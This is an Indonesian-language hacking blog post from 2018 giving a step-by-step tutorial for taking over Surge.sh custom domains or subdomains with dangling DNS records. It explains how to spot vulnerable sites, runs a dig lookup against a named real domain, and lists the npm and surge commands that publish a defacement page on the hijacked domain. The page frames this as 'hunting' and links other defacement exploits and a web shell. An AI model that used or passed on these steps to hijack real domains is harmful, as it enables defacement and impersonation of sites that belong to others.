• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Surge.sh Custom Domain or Subdomain Takeover

September 29, 2018 by Jack Wilder 1 Comment

Surge.sh Custom Domain or Subdomain Takeover – Sejauh ini melakukan takeover domain di Surge adalah yang paling mudah. Bukan bermaksud meremehkan, namun proses yang harus dilalui sangat simpel.

Yang harus Diperiapkan

  • OS Linux – bebas mau di lokal atau di vps.
  • Nodejs – install nodejs

Vuln

Berikut ciri-ciri situs yang bisa ditakeover

Error:

project not found

Dan syarat domain bisa ditakeover adalah :

  • CNAME mengarah ke na-west1.surge.sh

atau

  • A Record mengarah ke 45.55.110.124

Kalau salahsatu syaratnya terpenuhi, maka bisa kita takeover. Contoh:

dig agilesysadmin.com

; <<>> DiG 9.10.3-P4-Ubuntu <<>> agilesysadmin.com
;; global options: +cmd
.......
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;agilesysadmin.com. IN A

;; ANSWER SECTION:
agilesysadmin.com. 3599 IN A 45.55.110.124
...........

How to Takeover

Pastikan kalian sudah install Nodejs. Sekarang install Surge via npm.

sudo npm install --global surge

Sekarang kita buat direktori untuk file Surge. Karena kita hanya akan men-takeover domain jadi cukup upload saja index.html dengan script defacement page.

mkdir surge
cd surge
nano index.html

Sekarang kita run surge dengan perintah

surge path_project namadomain.

Contoh

surge /home/linuxsec/surge/ agilesysadmin.com

Contoh jika berhasil.

Lalu sekarang coba cek domain yang berhasil kita takeover.

Oke sekian tutorial kali ini. Happy hunting.

Shares

Filed Under: Domain Takeover, Web Hacking

Reader Interactions

Comments

  1. paks says

    October 21, 2018 at 10:01 pm

    di termux bisa ga

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Uptimerobot.com Custom Domain or Subdomain Takeover

Shopify Custom Domain or Subdomain Takeover

WordPress Fraction Theme Version 1.1.1 Privilege Escalation

Deface dengan Metode Timthumb Remote Code Execution

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Deteksi Celah No Redirect pada Suatu Situs menggunakan cURL

Exploit WPStore Themes Upload Vulnerability

MIME Type Sniffing pada Form Upload Gambar

LinuxSec / 87 queries in 0.19 seconds